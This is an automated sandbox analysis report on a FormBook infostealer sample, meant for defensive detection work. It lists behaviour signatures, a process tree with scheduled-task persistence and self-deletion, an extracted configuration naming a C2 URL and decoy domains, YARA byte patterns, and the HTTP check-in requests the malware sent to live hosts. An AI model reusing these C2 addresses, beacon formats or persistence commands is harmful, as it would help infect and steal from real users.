Analysis Report 08917506_by_Libranalysis

Overview

General Information

Sample Name: 08917506_by_Libranalysis (renamed file extension from none to exe)
Analysis ID: 403903
MD5: 089175069d5c095f078b7f8a3b28a22d
SHA1: a563615dfe562e7a11c2b7f21dcfcd412594eeee
SHA256: 173797a7a7a881f3d6230015620bae28d21b4b41b7e568c2a881b3c0829dd67e

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 08917506_by_Libranalysis.exe (PID: 1144 cmdline: 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe' MD5: 089175069D5C095F078B7F8A3B28A22D)
    • schtasks.exe (PID: 5596 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 08917506_by_Libranalysis.exe (PID: 1020 cmdline: C:\Users\user\Desktop\08917506_by_Libranalysis.exe MD5: 089175069D5C095F078B7F8A3B28A22D)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6820 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 7048 cmdline: /c del 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.evrbrite.com/o86d/"], "decoy": ["marielivet.com", "shadowlovely.com", "novfarm.com", "genialnetero.com", "nj-yanhua.com", "thaihuay88.com", "iizponja.com", "stark-stg.net", "nueforma.com", "fincheckxu.com", "joycasino-2020.club", "9thwrld.com", "komofood.com", "weekendcost.com", "marczeimet.com", "santequebec.info", "arpinaindustriesllc.com", "soyakmuzayede.com", "trivesse.online", "shonanwakukengyou.com", "whatisleanmanagement.com", "9icem.com", "blueberry-intl.com", "mylifequotenow.com", "octafxmate.com", "garnogroup.com", "saurara.com", "mydreamtv.net", "1fhewm.com", "agungproduk.com", "be7tv.com", "ohyescart.com", "sherylabrahamphotography.com", "oxfordfinancialadvising.com", "xn--80aaf2ckffc3a.xn--p1acf", "firstcoastelope.com", "novaquitaine-solidaire.com", "morumi.site", "lr-tn.com", "avondalevotes.com", "saranaturals.net", "thebraidedbreadcompany.com", "recruit-japan-hcm.com", "innovate.works", "changfangxinxi.com", "ckitco.com", "lacommusic.net", "cibass.com", "cafeciberseguridad.com", "fittogo.net", "franciszekmanteau.com", "liquidmarin.com", "toky5555.xyz", "bloomberg.sucks", "bluejay.ventures", "valleywomanforwoman.com", "helmutbuntjer.com", "870830.com", "xmrxapp.com", "lashicorn.com", "visionsbarbershop.com", "cinmax.xyz", "website-bazar.com", "zenseotools.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0xf2bf8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xf2f82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x119e18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x11a1a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xfec95:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x125eb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0xfe781:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x1259a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0xfed97:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x125fb7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0xfef0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x12612f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xf399a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x11abba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0xfd9fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x124c1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xf4712:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x11b932:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x103d87:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x12afa7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x104e2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: System File Execution Location Anomaly
Source: Process started | Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community | Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp', ParentImage: C:\Windows\SysWOW64\schtasks.exe, ParentProcessId: 5596, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 360

Persistence and Installation Behavior:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe', ParentImage: C:\Users\user\Desktop\08917506_by_Libranalysis.exe, ParentProcessId: 1144, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp', ProcessId: 5596

Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.evrbrite.com/o86d/"], "decoy": ["marielivet.com", "shadowlovely.com", "novfarm.com", "genialnetero.com", "nj-yanhua.com", "thaihuay88.com", "iizponja.com", "stark-stg.net", "nueforma.com", "fincheckxu.com", "joycasino-2020.club", "9thwrld.com", "komofood.com", "weekendcost.com", "marczeimet.com", "santequebec.info", "arpinaindustriesllc.com", "soyakmuzayede.com", "trivesse.online", "shonanwakukengyou.com", "whatisleanmanagement.com", "9icem.com", "blueberry-intl.com", "mylifequotenow.com", "octafxmate.com", "garnogroup.com", "saurara.com", "mydreamtv.net", "1fhewm.com", "agungproduk.com", "be7tv.com", "ohyescart.com", "sherylabrahamphotography.com", "oxfordfinancialadvising.com", "xn--80aaf2ckffc3a.xn--p1acf", "firstcoastelope.com", "novaquitaine-solidaire.com", "morumi.site", "lr-tn.com", "avondalevotes.com", "saranaturals.net", "thebraidedbreadcompany.com", "recruit-japan-hcm.com", "innovate.works", "changfangxinxi.com", "ckitco.com", "lacommusic.net", "cibass.com", "cafeciberseguridad.com", "fittogo.net", "franciszekmanteau.com", "liquidmarin.com", "toky5555.xyz", "bloomberg.sucks", "bluejay.ventures", "valleywomanforwoman.com", "helmutbuntjer.com", "870830.com", "xmrxapp.com", "lashicorn.com", "visionsbarbershop.com", "cinmax.xyz", "website-bazar.com", "zenseotools.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\OfCxSfBf.exe | ReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted file
Source: 08917506_by_Libranalysis.exe | Virustotal: Detection: 23%
Source: 08917506_by_Libranalysis.exe | ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\OfCxSfBf.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 08917506_by_Libranalysis.exe | Joe Sandbox ML: detected
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 08917506_by_Libranalysis.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: 08917506_by_Libranalysis.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb source: 08917506_by_Libranalysis.exe, 00000005.00000002.295591762.0000000003150000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL source: 08917506_by_Libranalysis.exe, 00000005.00000002.295591762.0000000003150000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: 08917506_by_Libranalysis.exe, 00000005.00000002.295139182.0000000001550000.00000040.00000001.sdmp, ipconfig.exe, 0000000F.00000002.495544603.0000000000D30000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 08917506_by_Libranalysis.exe, ipconfig.exe
Source: Binary string: mscorrc.pdb source: 08917506_by_Libranalysis.exe, 00000000.00000002.260684849.0000000009280000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe | Code function: 4x nop then mov esp, ebp | 0_2_05818E80
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe | Code function: 4x nop then mov esp, ebp | 0_2_05818E73

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 67.222.39.83:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 67.222.39.83:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 67.222.39.83:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 206.189.46.186:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 206.189.46.186:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 206.189.46.186:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49749 -> 192.0.78.24:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49749 -> 192.0.78.24:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49749 -> 192.0.78.24:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 162.0.232.119:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 162.0.232.119:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 162.0.232.119:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.evrbrite.com/o86d/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.cinmax.xyz
Source: global traffic | HTTP traffic detected: GET /o86d/?W6jDfD=FLq1m09lMNVeUGxb2EGlpEcYOBglVjP6VclDGdRBVwR1mwk4Bp+oxJyzVgRWjmk7leVMWGvpeQ==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.cinmax.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /o86d/?W6jDfD=ciPSY9IHIiBMUeM+AHa6rnkVhX0NcoOlsc17DR+fEw9UxF+XyC1njkrt1st9cFa0q3XsiD0AOg==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.genialnetero.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /o86d/?W6jDfD=sTrQNZETbqohgMY0G3QDWOyfMZqAyHA57kuO1l/GbTBT7+5tNjLfMqbR0u4OJ3a+5b59BonIRA==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.joycasino-2020.club | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /o86d/?W6jDfD=PL9u7p4v7hn5T83wCAG42BUGAPPNW4v8+s1TFKrmIVkrOUDjB/r4wvcv+gOAAG+Oa4qYtq3B7Q==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.marielivet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /o86d/?W6jDfD=LOco70LpFY5umcR4dQY6Ck5isx6bsPxuRuPfG/JQuVwPWdFiKckkP6tLRm3hZqsbjizE9R3VWg==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.firstcoastelope.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /o86d/?W6jDfD=lH+NNz2eaU5LSk/yemMXIWDwl3fMAuCKISb0DcDmH6anXfUVh7p155egYD4l1a4C4v8/cW+zhg==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.blueberry-intl.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /o86d/?W6jDfD=Zr1mHD0UzvWCQcI2JlGAeokzkFEIblHMxqeZtw3W9dCQQ7exnTCb8lR/2qgknbIFYyB/eFrcFw==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.thaihuay88.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k+L08OvZwr0NYVY1MAp4q6WCjDapjCg57Vf4Q==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.website-bazar.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4HvmT9bEqgnu31MbrCbNdKakV5eJA==&Yn=ybdHh8KP02GTtb HTTP/1.1 | Host: www.sherylabrahamphotography.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 192.0.78.24
Source: Joe Sandbox View | ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Joe Sandbox View | ASN Name: AUTOMATTICUS
Source: unknown | DNS traffic detected: queries for: www.cinmax.xyz
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 04 May 2021 12:07:24 GMT | Server: Apache/2.4.29 (Ubuntu) | Content-Length: 328 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 38 36 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /o86d/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000000.272184398.0000000006840000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230294482.0000000005BC1000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comde
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: 08917506_by_Libranalysis.exe | String found in binary or memory: http://www.churchsw.org/church-projector-project
Source: 08917506_by_Libranalysis.exe | String found in binary or memory: http://www.churchsw.org/repository/Bibles/
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253501338.0000000005BB0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comaa
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253501338.0000000005BB0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comceco
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
